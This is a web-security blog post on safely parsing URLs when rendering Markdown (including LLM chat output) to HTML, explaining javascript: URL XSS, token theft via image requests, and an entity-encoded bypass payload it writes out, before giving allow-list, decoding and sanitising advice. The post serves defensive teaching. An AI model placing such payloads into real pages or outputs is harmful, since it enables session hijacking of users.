~ 9 min read
How to Parse URLs from Markdown to HTML Securely?
Initially, this might sound like a simple question: just use the built-in url
module in Node.js to parse URLs, right? Or better yet, use the JavaScript URL
object via new URL()
and go from there to extract the parts you need but this might not be as easy as it seems.
Maybe? Letâs evaluate based on a real-world scenario that Iâve seen done in the wild. Referring specifically to Markdown based libraries.
Markdown to HTML
One of the most popular use-cases that require handling URL parsing is that of when you need to handle Markdown formatted content and render it on a web page, so it needs to be translated into its HTML equivalent.
Actually, this might sound even more popular to you than ever before, due to the rise of LLM (Large Language Models) and the requirement to achieve structured content that gets returned by these generative text models in the response payload and then you need to render them on the page.
To put that use-case example into practical terms, imagine you have the following React component that renders a chat-bot like interface on the page:
Practically, the messages are using a library like marked-react
to convert the Markdown syntax from the LLM response into HTML as follows:
Parsing Dangerous URLs from Markdown
Ok so we covered the use-case to provide an example of where and why youâll often need to handle URL parsing from arbitrary strings, be it Markdown or otherwise.
Now imagine how the content from Markdown might look like:
Or maybe:
So what stops someone from crafting a malicious URL that makes use of the javascript:
protocol scheme to execute arbitrary JavaScript code, which is exactly how we get to Cross-site Scripting (XSS) vulnerabilities?
Imagine the following XSS payload:
A markdown parser might naively turn the URL part word-to-word in terms of intent into the equivalent HTML anchor tag:
Whatâs in a JavaScript alert(âXSSâ) ?
Oh, right. This might not seem dangerous at first glance. Whatâs in an alert pop-up?
But if for example you use JWT to manage authentication and store them in local storage, then this type of an XSS attack can allow exfiltrating the JWT token and hijack the userâs session. Imagine the following:
I wish it was that easy, but itâs not. If youâve been doing web development for a bit you probably got bitten by this little thing called CORS, which is the devil, but letâs not side-track. CORS is a browserâs security feature that prevents cross-origin requests (requests from one origin (domain) to another, sort of), so the above example wonât work as-is. So not really devil? more like your guardian angel đŞ˝.
Game not over though, we can come up with JavaScript code that would create an image tag and set the src
attribute to the URL we want to exfiltrate the token to:
Slick, eh? :-)
Anyways, Iâm digressing here. But I do enjoy showing you and teaching you a bunch of web security tricks!
Parsing a URL in JavaScript
So back to the problem at hand. You get a markdown link element with a URL of javascript:alert()
and now what? Well, maybe you pass it to new URL()
or maybe you manually parse it with a regex pattern to ensure it doesnât include invalid protocols like javascript:
, right? So youâd have a snippet of code that looks like this:
And then youâll likely have a function that denies any URLs with those protocol schemes that can turn into an XSS attack. Congrats.
Insecure URL Parsing
But what if I told you that denying protocol schemes like that is not enough? đ˛
Imagine user input, or a tricked LLM generated response that includes the following URL:
This might look odd to you but the browser certainly knows how to interpret it. Your regex pattern matching logic will not catch this attack because it doesnât strictly match the string âjavascriptâ, right?
What does it do though? Letâs break it down. First of all, the text 	
is an HTML entity. Specifically this one, refers to the horizontal tab character. Each of these characters have a meaning:
&
starts the entity reference.#
indicates a numeric character reference.x09
is the hexadecimal Unicode code point for the tab character (equivalent to decimal 9).;
ends the entity reference.
Similarly, there are other payloads that utilize HTML entities to bypass bad regex patterns or just generally insecure pattern matching logic that would allow the URL to be kept as-is, and when it hits the DOM, the browser will easily interpret it as a JavaScript URL.
How to Securely Parse URLs from Markdown
At this point I think weâve made the point about the dangers of parsing URLs. So to get on with the positive side of things, letâs talk about patterns and security best practices on how to properly and securely address the issue of URL parsing.
The following are built in specific ascending order of the practices you should follow to secure your URL parsing logic:
1. Allow-list vs Deny-list
Development paradigms such as maintaining the unsafeLinkPrefix
array are a form of a deny-list and thatâs often a bad pattern. The reason is that attackers will always come up with novel ways and new tricks to bypass your deny-list and you on the other hand have to keep up with it and maintain it. Itâs a losing battle.
So, instead of having a deny-list that includes javascript:
and any other protocols you deem dangerous, change perspectives. Work from an allow-list. What makes it reasonable for you to allow in a URL pattern for it to be valid in your use-cases?
For example, allow only the https:
protocol.
2. Use secure anchor tags
When you render the URL as an anchor tag, you can utilize web standards that help enforce hardened security. For example, by default, render all these anchor HTML elements with the attributes rel="noopener noreferrer"
and the target="_blank"
attribute.
By doing that, the browser will open the URL in a new tab and will not allow the new tab to access the window.opener
property, which is a common vector for phishing attacks.
3. Secure by default
This practice I specifically want to devote to library authors.
If youâre maintaining a library or a form of 3rd-party dependency that handles the parsing logic you might say that it is not your responsibility to decide whether URLs are opened in the same browsing tab or a new tab, or whether you should also support the ftp://
protocol scheme.
I get you.
But thereâs a lot of value in providing a safe, hardened Secure by default approach that guarantees safe security defaults for the absolute majority of users and then building on top of it a way for consumers to opt-out of these safe defaults and change the behavior to allow for more flexibility. At that point, they hopefully consider the security implications of deviating from the default and then make an informed decision (hopefully đ ).
4. Decode URLs
URLs can be encoded in various ways. For example, the URL https://lirantal.com
can be encoded as https%3A%2F%2Flirantal.com
. Specifically though, that URL isnât considered valid for the primary domain. However, since this is an article and Iâve no idea how you are intending to parse URLs then it is also possible that you may have a use-case in which you get URLs from a query string, like say https://example.com?redirect=https%3A%2F%2Flirantal.com
and thatâs where encoding and decoding URLs comes in handy.
So all that to say, your first step in parsing URLs is to first decode them so that you get a normalized URL representation that you can work with.
In technical terms it means:
5. Sanitize HTML entities and control characters
As weâve seen in the example of the jav	ascript:alert('XSS');
URL, you should also take into account that URLs can be crafted with some payloads that you wouldnât expect such as HTML entities.
Other characters might be employing some form of control characters that can be used to bypass your URL parsing logic.
The only way to handle these characters is to match them via string pattern matching (such as a regex) and remove them from the URL before you consider evaluating it.
Following is my recommendation for a practical and secure regular expression to match and remove HTML entities from a URL:
Another variation of the above that you may consider is the following all-in-one regex:
6. Use the URL parser
Finally, pass the URL to the new URL()
function and handle error exceptions.
For example, even if you skip the previous step of sanitizing HTML entities and pass the URL as-is to the new URL()
function, it will throw an error because the usage of HTML entities in a protocol scheme is invalid:
Still, youâd probably want to keep the URL sanitization logic in place and ensure you are also passing it over to the new URL()
function to ensure itâs a valid URL and no errors are thrown.
If you do choose to make use of the URL() constructor web API then you probably want to approach this ordered practices list in a different order. Meaning, once youâve decoded the URL, sanitized it and ran it through new URL()
then you can apply the allow-list logic by checking the protocol scheme via the returned objectâs url.protocol
property.